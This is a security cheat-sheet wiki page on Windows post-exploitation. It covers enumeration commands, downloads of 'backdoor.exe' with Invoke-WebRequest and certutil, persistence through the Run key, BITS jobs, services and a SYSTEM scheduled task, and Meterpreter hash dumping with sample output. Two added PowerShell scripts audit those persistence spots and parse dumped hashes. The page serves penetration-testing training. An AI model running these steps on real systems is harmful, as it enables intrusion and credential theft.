post exploit windows - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Windows Post Exploit

Information Gathering

System

| Command | Description and/or Reason |
|---|---|
| `tasklist` | Lists all running processes. |
| `taskkill` | Kills a process. |
| `sfc /scannow` | Scans the system files for errors. |
| `driverquery` | Returns a list of drivers. For example `driverquery -v` returns verbose information about all drivers installed on your system. |
| `fc` | File compare. `diff` is far more useful than `fc`. |
| `powercfg` | Manages and tracks your power usage (electric consumption). Some useful forms are `powercfg /a`, `powercfg /hibernate on`, `powercfg /hibernate off` and `powercfg /devicequery s1_supported`. `powercfg /lastwake` shows which device last woke up your computer, useful if your computer wakes up for unknown reasons. This needs a (cmd) console launched with admin rights: right-click the Command Prompt shortcut and select Run as administrator. |
| `powercfg /energy` | Creates an (HTML) statistics page of the energy usage, very interesting for laptops. Also needs to be run as administrator. |
| `powercfg /batteryreport` | Same as above, but for the battery. |
| `shutdown` | `shutdown /r /o` restarts your computer and launches the Advanced Startup Options menu, where you can access Safe Mode and the Windows recovery utilities. Very handy when troubleshooting. |
| `systeminfo` | Returns a bunch of interesting system information. Use `systeminfo /s` followed by the host name of a computer on your local network to grab the information for that system remotely. This may require additional syntax elements for the domain, user name and password, like this: `systeminfo /s [host_name] /u [domain]\[user_name] /p [user_password]` |
| `assoc` | Returns a list of the current file associations. For example, `assoc .txt` shows which file type `.txt` belongs to, and `assoc .txt=` changes the association for text files to whatever you enter after the equal sign. |
| `clip` | The clipboard for command-line use. Very useful when you want the output of a program in your clipboard: pipe the output into `clip`, for example `systeminfo \| clip`, which sends the output of `systeminfo` to your clipboard so you can paste it somewhere else. The pipe is the character you get by pressing Alt+124. |
| `pkgmgr /iu:"TelnetClient"` | Installs the Telnet client. `pkgmgr` is deprecated on Windows 10, use `dism` instead. |
| `cipher` | Used to permanently wipe files that were already deleted, so that they can't be recovered with special recovery software. Be aware that when you delete a file, the data isn't deleted, only the reference to it is. The space used by the old file is marked as free and is eventually allocated to new data, which then overwrites the old data. As long as the system hasn't overwritten it, the old data can easily be recovered. `cipher` wipes the free space of a drive by writing random data over it, in the hope that the old data can't be recovered; it still can, but it is much harder and needs another type of recovery tool. `cipher` doesn't delete files that "still exist" (whose reference is still in the file allocation table, the FAT). For example, `cipher /w:C:\` wipes the free space on the C: drive without deleting existing data. |

Network

| Command | Description and/or Reason |
|---|---|
| `ipconfig /all` | Shows the full network configuration of every adapter. |
| `ipconfig /release` | Releases the IP address, if the adapter is in DHCP mode. |
| `ipconfig /renew` | Renews the IP address, if the adapter is in DHCP mode. |
| `ipconfig /flushdns` | Flushes the DNS cache. |
| `hostname` | Gets the hostname. |
| `ping <hostname or ip>` | Says hello to another computer. |
| `tracert` | Traces and follows the path of your network connection. |
| `pathping <hostname or ip>` | A tool that combines the best parts of `ping` and `tracert`. |
| `getmac` | Gets the MAC address of your network cards. |
| `arp` | Address Resolution Protocol cache; the most common usage is `arp -a`. |
| `nslookup <hostname>` | Used for checking DNS record entries. |
| `nbtstat` | Diagnostic tool for troubleshooting NetBIOS issues. |
| `net` | Used for managing users, services, shares etc. |
| `route` | Manipulates the network routing tables. |
| `netstat` | Displays information about TCP and UDP connections and ports. See `netstat -an`. |

User Accounts

| Command | Description and/or Reason |
|---|---|
| `net user <username> <password> /add` | Create a new user on the system. |
| `net localgroup Administrators <username> /add` | Add a user to the Administrators group. |
| `net localgroup Administrators` | Check who belongs to the Administrators group. |

Obtain user's information

...

Credentials

...

Configs

...

Finding Important Files

...

Other Utilities

...

Covering Your Tracks

...

Avoiding history files

...

Deleting and Destroying

...

Escalating

...

Looking for possible opened paths

...

Delivery methods

See also the upload command in msfconsole.

With powershell:

Invoke-WebRequest http://10.x.x.x/backdoor.exe

With certutil:

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Maintaining control

See also other ways of keeping persistence.

  • Using scheduled tasks
  • Creating another user
  • Backdooring RDP
  • Reverse shell

Windows Startup folder

C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

With the registry

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\USERNAME\AppData\Roaming\backdoor.exe"

Using BITS

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Create the job:

bitsadmin /create backdoor

Set the command line that runs when the job completes (the first argument is the job name):

bitsadmin /SetNotifyCmdLine backdoor cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\USERNAME\Documents\backdoor.exe"

Make it persistent with a minimum retry delay of 30 seconds:

bitsadmin /SetMinRetryDelay backdoor 30

Start/resume the job:

bitsadmin /resume backdoor

By creating a dedicated service

In PowerShell:

New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Automatic"

Note: the service is created in the stopped state, but if you check its properties in the Services GUI you will see that it is set to start automatically.

Scheduled Tasks

Scheduled tasks are used to launch specific programs or scripts at a pre-defined time or when a condition is met (e.g. a user logs in).

PowerShell can be used to create a scheduled task and ensure persistence, but for that we have to use several cmdlets. These are:

  • New-ScheduledTaskAction - Defines the action that is going to be performed.
  • New-ScheduledTaskTrigger - Defines the trigger (daily/weekly/monthly, at logon, etc.). The trigger is the condition that, when met, makes the scheduled task launch the action.
  • New-ScheduledTaskPrincipal - Defines the user the task will run as.
  • New-ScheduledTaskSettingsSet - Creates the settings object for the task.
  • New-ScheduledTask - Assembles the action, trigger, principal and settings into a task object.
  • Register-ScheduledTask - Creates the task.

Knowing this, let's create the task using PowerShell.

PS > $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Administrator\Desktop\backdoor.exe"
PS > $B = New-ScheduledTaskTrigger -AtLogOn
PS > $C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS > $D = New-ScheduledTaskSettingsSet
PS > $E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
PS > Register-ScheduledTask Backdoor -InputObject $E
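The other side of the persistence methods listed in this chapter (startup folder, Run keys, BITS jobs, auto-start services, scheduled tasks running as SYSTEM, and the Administrators group check from the User Accounts table) is reviewing a host for them. The script below is an added example written for this page, not part of the original cheat sheet. It assumes an elevated PowerShell on the host under review; the "trusted root" prefixes and the Suspicious heuristic are illustrative choices, not a rule, and the cmdlet, key and path names are the standard Windows ones.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original cheat sheet): review the persistence
# locations described in this chapter. Heuristic: an auto-start entry whose
# binary lives outside Windows / Program Files is worth a closer look.

$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Test-TrustedPath {
    param([string]$CommandLine)
    # Drop quotes and compare the start of the command line against the trusted roots.
    $exe = ($CommandLine -replace '"', '').Trim()
    foreach ($root in $TrustedRoots) {
        if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding {
    param([string]$Source, [string]$Name, [string]$Detail, [bool]$Suspicious)
    $Findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Detail = $Detail; Suspicious = $Suspicious })
}

# 1. Startup folders (per-user, as on this page, plus the all-users one).
$startupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
)
foreach ($dir in $startupDirs) {
    Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'StartupFolder' $_.Name $_.FullName $true }  # anything here deserves a look
}

# 2. Run / RunOnce keys for the current user and for the machine.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object {
        Add-Finding 'RunKey' "$key\$($_.Name)" $_.Value (-not (Test-TrustedPath $_.Value))
    }
}

# 3. BITS jobs of all users. A job that keeps retrying with a notify command line
#    is the pattern described above; bitsadmin /getnotifycmdline <job> shows that command.
Import-Module BitsTransfer -ErrorAction SilentlyContinue
Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue | ForEach-Object {
    $files = ($_.FileList | ForEach-Object { "$($_.RemoteName) -> $($_.LocalName)" }) -join '; '
    Add-Finding 'BITS' $_.DisplayName "owner=$($_.OwnerAccount) state=$($_.JobState) retry=$($_.MinimumRetryDelay)s files=[$files]" $true
}

# 4. Services that start automatically from outside the trusted roots.
Get-CimInstance Win32_Service | Where-Object { $_.StartMode -eq 'Auto' } | ForEach-Object {
    Add-Finding 'Service' $_.Name $_.PathName (-not (Test-TrustedPath $_.PathName))
}

# 5. Scheduled tasks running as SYSTEM whose action points outside the trusted roots.
Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.Principal.UserId -match 'SYSTEM' } | ForEach-Object {
    foreach ($action in $_.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
        $cmd = "$($action.Execute) $($action.Arguments)".Trim()
        # For "cmd.exe /c <target>" judge the target, not cmd.exe itself.
        $target = if ($action.Execute -match 'cmd(\.exe)?$' -and $action.Arguments -match '/c\s+(.+)$') { $Matches[1] } else { $cmd }
        Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName)" $cmd (-not (Test-TrustedPath $target))
    }
}

# 6. Local Administrators membership (the "net localgroup Administrators" check).
Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | ForEach-Object {
    Add-Finding 'LocalAdmin' $_.Name "$($_.PrincipalSource)" $false
}

$Findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

Run it as-is in an elevated session; Suspicious entries are sorted to the top. The path heuristic deliberately errs towards noise (a legitimately installed tool under a user profile will show up too), so the list is a starting point for review, not a verdict.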

Reverse Shell

See the dedicated document: Reverse Shell

Execute a Remote Script

...

Hash Dumping

There are different techniques to obtain the hashes of the users on a Windows system.

Note that you need to be running as the SYSTEM user; this will not work even if you have Administrator rights. So we probably first need to migrate to a process running as NT AUTHORITY\SYSTEM.

Technique 1:

Note that the NT hash is in column 4 (username:RID:LM hash:NT hash:::).

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 31066436b67d1dfb03c9f249b9aed099...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:52745740e9a05e6195731194f03865ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
joe:1000:aad3b435b51404eeaad3b435b51404ee:878d8014606cda29677a44efa1353fc7:::
chris:1001:aad3b435b51404eeaad3b435b51404ee:e0b6050c7280bf4a7bee599cf374fd80:::
tryhackme:1002:aad3b435b51404eeaad3b435b51404ee:0c7ba4684821cd349e327896d9db4474:::
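To make the column layout of the output above explicit, here is an added PowerShell example (not part of the original cheat sheet) that parses lines in this format and flags what an auditor would look at first: well-known built-in RIDs and accounts whose NT hash is the hash of an empty password. The sample lines are the ones shown on this page; the two sentinel hash values are well-known constants, and `ConvertFrom-PwdumpLine` is a name chosen for this example.

```powershell
# Added example (not from the original cheat sheet): parse hashdump lines.
# Sample input: the lines shown on this page (constructed here as a here-string).
$SampleDump = @'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:52745740e9a05e6195731194f03865ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
joe:1000:aad3b435b51404eeaad3b435b51404ee:878d8014606cda29677a44efa1353fc7:::
'@

# Well-known sentinel values (constants, not page-specific):
$EmptyLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM hash of an empty password; also stored when LM hashing is disabled
$EmptyNt = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash (MD4 of the UTF-16LE empty string) of an empty password

function ConvertFrom-PwdumpLine {
    param([Parameter(Mandatory)][string]$Line)
    # Format: <user>:<RID>:<LM hash>:<NT hash>:::  (the trailing empty fields are unused here)
    $f = $Line.Trim().Split(':')
    if ($f.Count -lt 4) { throw "Not a pwdump line: $Line" }
    $rid = [int]$f[1]
    [pscustomobject]@{
        User          = $f[0]
        RID           = $rid
        LMHash        = $f[2].ToLower()
        NTHash        = $f[3].ToLower()            # column 4 of the dump
        BuiltIn       = $rid -lt 1000              # 500 Administrator, 501 Guest, 503 DefaultAccount; created users start at 1000
        LMDisabled    = $f[2].ToLower() -eq $EmptyLm
        EmptyPassword = $f[3].ToLower() -eq $EmptyNt
    }
}

$accounts = $SampleDump -split "`r?`n" | Where-Object { $_ -match ':' } | ForEach-Object { ConvertFrom-PwdumpLine $_ }
$accounts | Format-Table User, RID, BuiltIn, LMDisabled, EmptyPassword, NTHash -AutoSize

# Audit view. The SAM dump does not say whether an account is disabled (Guest usually is),
# so cross-check with "net user <name>" before treating an empty password as a live issue.
$accounts | Where-Object EmptyPassword | ForEach-Object { "empty password: $($_.User) (RID $($_.RID))" }
```

On the sample above, Guest and DefaultAccount are the two entries with the empty-password NT hash, and every line carries the LM sentinel, meaning the system stores no LM hashes.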

Technique 2:

We can also dump credentials with kiwi, the Meterpreter equivalent of mimikatz. To do that, you first need to load the module: load kiwi.

The command used to dump the SAM database hashes is: lsa_dump_sam

Resources